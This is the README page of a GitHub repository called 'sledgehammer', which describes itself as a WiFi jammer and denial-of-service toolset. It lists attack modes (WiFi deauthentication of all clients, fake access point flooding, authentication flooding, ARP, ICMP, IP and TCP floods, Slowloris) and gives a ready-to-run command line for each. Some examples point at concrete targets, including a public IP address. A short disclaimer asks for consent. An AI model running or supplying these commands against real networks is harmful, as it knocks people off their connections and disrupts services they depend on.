Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

🔨 📶 WiFi-Jammer/DoS toolset

License

NotificationsYou must be signed in to change notification settings

mike01/sledgehammer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

General information

Sledgehammer is collection of Jammer/DoS tools for various protocols. Those include at minimum:

  • WiFi (smart deauthentication, DoS via fake AP creation, DoS via authentication)
  • arp
  • ip
  • icmp
  • tcp

Requirements

Installation

Just download and execute.

Usage examples

Get general help via: python sledgehammer.py --helpDepending on attack mode parameters can vary. See mode-parameters for more info.Default source MAC and IP address is the one of the interface given by 'iface_name'.

  • WiFI DoS via smart deauthentication: Disconnect all WiFi clients

    python sledgehammer.py --mode wifi_deauth --iface_name wlan1 --count 9999

  • WiFI DoS via smart deauthentication: Disconnect all WiFi clients except '00:11:22:33:44:55'

    python sledgehammer.py --mode wifi_deauth --iface_name wlan1 --nobroadcast --macs_excluded 00:11:22:33:44:55 --count 9999

  • WiFi DoS via mass fake APs

    python sledgehammer.py --mode wifi_ap --iface_name wlan1 --channels 1 --count 9999

  • WiFi DoS via mass auth

    python sledgehammer.py --mode wifi_auth --iface_name wlan1 --mac_dst 00:11:22:33:44:55:66 --channels 4 --count 9999

  • ARP

    python sledgehammer.py --mode arp --iface_name wlan1 --mac_dst 00:11:22:33:44:55 --ip_dst 192.168.178.1

  • ICMP

    python sledgehammer.py --mode icmp --iface_name wlan1 --mac_dst 00:11:22:33:44:55:66 --ip_dst 192.168.178.1

  • IP

    python sledgehammer.py --mode ip --iface_name wlan0 --mac_dst 00:11:22:33:44:55:66 --ip_dst 192.168.178.123 --count 9999

  • TCP

    python sledgehammer.py --mode tcp --iface_name wlan1 --mac_dst 00:11:22:33:44:55:66 --ip_dst 193.99.144.80 --port_dst 443

  • Slowlory

    python sledgehammer.py -m slowlory --ip_dst 1.2.3.4 --port_dst 80 -i wlan0

    python sledgehammer.py -m slowlory --ip_dst www.domain.com --port_dst 443 --ssl True -i wlan0

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved.


[8]ページ先頭

©2009-2025 Movatter.jp